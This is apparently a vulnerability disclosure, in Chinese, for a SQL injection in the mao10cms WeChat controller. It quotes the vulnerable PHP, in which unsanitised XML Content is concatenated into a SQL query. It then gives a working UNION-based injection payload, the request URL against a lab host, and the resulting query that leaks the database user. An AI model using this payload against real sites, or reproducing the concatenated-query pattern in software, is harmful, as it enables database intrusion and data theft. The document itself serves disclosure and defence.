<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul><pre class=""> if( $tmpStr == $signature ){ echo $echostr; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if (!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $msgtype = $postObj->MsgType; $content = trim($postObj->Content); $date = strtotime("now"); if($content!='') { $return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value'); if($return_to!='') : $return_to_user = $return_to; else : $return_to_user = '我没有理解您的问题,请访问我们的网站:'.mc_site_url(); endif; echo "<xml> <ToUserName>$fromUsername</ToUserName> <FromUserName>$toUsername</FromUserName> <CreateTime>$date</CreateTime> <MsgType>text</MsgType> <Content>$return_to_user</Content> </xml>"; } }...
<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul><pre class=""> if( $tmpStr == $signature ){ echo $echostr; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if (!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $msgtype = $postObj->MsgType; $content = trim($postObj->Content); $date = strtotime("now"); if($content!='') { $return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value'); if($return_to!='') : $return_to_user = $return_to; else : $return_to_user = '我没有理解您的问题,请访问我们的网站:'.mc_site_url(); endif; echo "<xml> <ToUserName>$fromUsername</ToUserName> <FromUserName>$toUsername</FromUserName> <CreateTime>$date</CreateTime> <MsgType>text</MsgType> <Content>$return_to_user</Content> </xml>"; } } </pre><p>$content直接从用户传入的XML获取,拼接到SQL语句中导致SQL注入漏洞。</p><p>当用户传入:</p><pre class=""><?xml version="1.0" encoding="utf-8"?> <xml> <ToUserName>aa</ToUserName> <MsgType>aa</MsgType> <Content>asdasd") union select user()#</Content> <FromUserName>a</FromUserName> </xml> <br></pre><p>执行的SQL语句为:<br></p><pre class="">SELECT `meta_value` FROM `mc_option` WHERE ( type="wx_huifu" AND meta_key="asdasd") union select user()#" ) LIMIT 1</pre><p>页面返回:</p><p> </p><p><img alt="57145FC8-2F19-448D-BEAF-32A75CF3B061.png" src="https://images.seebug.org/@/uploads/1434332447151-57145FC8-2F19-448D-BEAF-32A75CF3B061.png" data-image-size="364,87"><br></p><p>证明漏洞存在。</p><p>使用Hackbar,POST内容到:</p><pre class="">http://10.211.55.12/mao10cms/index.php?m=control&c=Weixin&a=callback_url&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=&weixin_token=x</pre><p>内容为:</p><pre class=""><?xml version="1.0" encoding="utf-8"?> <xml> <ToUserName>aa</ToUserName> <MsgType>aa</MsgType> <Content>asdasd") union select user()#</Content> <FromUserName>a</FromUserName> </xml> </pre><p>得到数据库当前用户:</p><p><img alt="96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" src="https://images.seebug.org/@/uploads/1434332488347-96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" data-image-size="489,270"><br></p>
